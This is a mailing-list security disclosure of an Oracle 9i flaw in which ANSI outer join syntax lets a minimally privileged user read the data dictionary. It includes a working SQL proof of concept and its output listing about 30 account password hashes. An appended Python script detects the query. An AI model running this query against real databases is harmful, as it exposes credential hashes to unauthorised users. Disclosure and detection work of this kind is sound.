Hi

Oracle have now posted an advisory to their security alerts page on 17 April.
The URL is http://otn.oracle.com/deploy/security/pdf/sql_joins_alert.pdf

cheers

Pete Finnigan

In article <[EMAIL PROTECTED]>, Pete Finnigan <[EMAIL PROTECTED]> writes
>Hi all
>
>I thought this list may be interested in this issue, apologies if it's
>known here already.
>
>Oracle 9i includes the new ANSI outer join syntax. Oracle still supports
>the old syntax but in the new syntax there is a serious security issue
>that allows any user to view any data.
>
>here is an example:
>
>SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2
>
>(c) Copyright 2001 Oracle Corporation. All rights reserved.
>
>
>Connected to:
>Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
>With the Partitioning option
>JServer Release 9.0.1.1.1 - Production
>
>SQL> connect / as sysdba
>Connected.
>SQL> CREATE USER us1 IDENTIFIED BY us11;
>
>User created.
>
>SQL> Grant Create Session to us1;
>
>Grant succeeded.
>
>SQL> connect us1/us11;
>Connected.
>SQL> select a.username, a.password
>  2  from sys.dba_users a left outer join sys.dba_users b on
>  3  b.username = a.username
>  4  ;
>
>USERNAME                       PASSWORD
>------------------------------ ------------------------------
>SYS                            D4C5016086B2DC6A
>SYSTEM                         D4DF7931AB130E37
>DBSNMP                         E066D214D5421CCC
>AURORA$JIS$UTILITY$            INVALID_ENCRYPTED_PASSWORD
>OSE$HTTP$ADMIN                 INVALID_ENCRYPTED_PASSWORD
>AURORA$ORB$UNAUTHENTICATED     INVALID_ENCRYPTED_PASSWORD
>SCOTT                          F894844C34402B67
>US1                            491AB9AB94D8A9EF
>OUTLN                          4A3BA55E08595C81
>ORDSYS                         7EFA02EC7EA6B86F
>OLAPSVR                        AF52CFD036E8F425
>
>USERNAME                       PASSWORD
>------------------------------ ------------------------------
>OLAPSYS                        3FB8EF9DB538647C
>ORDPLUGINS                     88A2B2C183431F00
>MDSYS                          72979A94BAD2AF80
>CTXSYS                         71E687F036AD56E5
>WKSYS                          69ED49EE1851900D
>OLAPDBA                        1AF71599EDACFB00
>QS_CBADM                       7C632AFB71F8D305
>QS_ADM                         991CDDAD5C5C32CA
>QS                             8B09C6075BDF2DC4
>QS_WS                          24ACF617DD7D8F2F
>HR                             6399F3B38EDF3288
>
>USERNAME                       PASSWORD
>------------------------------ ------------------------------
>OE                             9C30855E7E0CB02D
>PM                             72E382A52E89575A
>SH                             9793B3777CD3BD1A
>QS_ES                          E6A6FA4BB042E3C2
>QS_OS                          FF09F3EB14AE5C26
>RMAN                           E7B5D92911C831E1
>QS_CB                          CF9CFACF5AE24964
>QS_CS                          91A00922D8C0F146
>
>30 rows selected.
>
>SQL>
>
>This shows that a user with the barest of privileges, i.e. CREATE
>SESSION, can actually see data in the data dictionary that should not be
>seen. In this example we can select the list of usernames and their
>hashes.
>
>I wanted to bring this issue to the security community as it's doing the
>rounds on the Oracle server newsgroup. Oracle are already aware of this
>as there is a bug to cover it, number 2121935. It's marked as fixed in 9.2
>and will not be back ported to earlier versions of Oracle. I could not
>find this on the Oracle security alerts site or on the Bugtraq database
>so here it is.
>
>Best regards
>
>Pete Finnigan
>www.pentest-limited.com
>

--
Pete Finnigan
IT Security Consultant
PenTest Limited

Office  01565 830 990
Fax     01565 830 889
Mobile  07974 087 885

[EMAIL PROTECTED]
www.pentest-limited.com
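
Added example, not part of the original post or of Oracle's advisory: a defender-side triage sketch for the issue described above. It checks a version banner against the "fixed in 9.2" statement and flags logged statements where a non-privileged user combines ANSI outer join syntax with a SYS-owned object. The statement records, the privileged-user set and the function names are constructed assumptions, not an Oracle log format.

```python
import re

# Constructed sample: (db_user, sql_text) pairs as they might be exported from
# a statement log. The layout is an assumption, not an Oracle format.
STATEMENTS = [
    ("US1", "select a.username, a.password from sys.dba_users a "
            "left outer join sys.dba_users b on b.username = a.username"),
    ("US1", "select table_name from user_tables"),
    ("SYSTEM", "select a.username from sys.dba_users a left outer join "
               "sys.dba_users b on b.username = a.username"),
    ("SCOTT", "select e.ename, d.dname from emp e, dept d "
              "where e.deptno = d.deptno(+)"),  # old outer join syntax
    ("SCOTT", "select e.ename from emp e full outer join sys.dba_users u "
              "on u.username = e.ename"),
]

# Constructed: accounts that legitimately hold SELECT on SYS dictionary views.
PRIVILEGED = {"SYS", "SYSTEM"}

ANSI_OUTER_JOIN = re.compile(r"\b(left|right|full)\s+(outer\s+)?join\b", re.I)
SYS_OBJECT = re.compile(r"\bsys\.([a-z0-9_$#]+)", re.I)


def is_affected_release(banner):
    """True for a 9i banner older than 9.2, where the post says the bug is fixed."""
    m = re.search(r"Release (\d+)\.(\d+)", banner)
    if not m:
        return False
    return int(m.group(1)) == 9 and int(m.group(2)) < 2


def flag_statements(statements, privileged):
    """Return (user, [sys objects]) for suspicious ANSI outer joins."""
    findings = []
    for user, sql in statements:
        if user.upper() in privileged:
            continue  # access is expected for these accounts
        if not ANSI_OUTER_JOIN.search(sql):
            continue  # old (+) syntax and plain selects are out of scope
        objects = sorted({name.lower() for name in SYS_OBJECT.findall(sql)})
        if objects:
            findings.append((user, objects))
    return findings


if __name__ == "__main__":
    print(is_affected_release(
        "Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production"))
    for user, objects in flag_statements(STATEMENTS, PRIVILEGED):
        print(user, objects)
```
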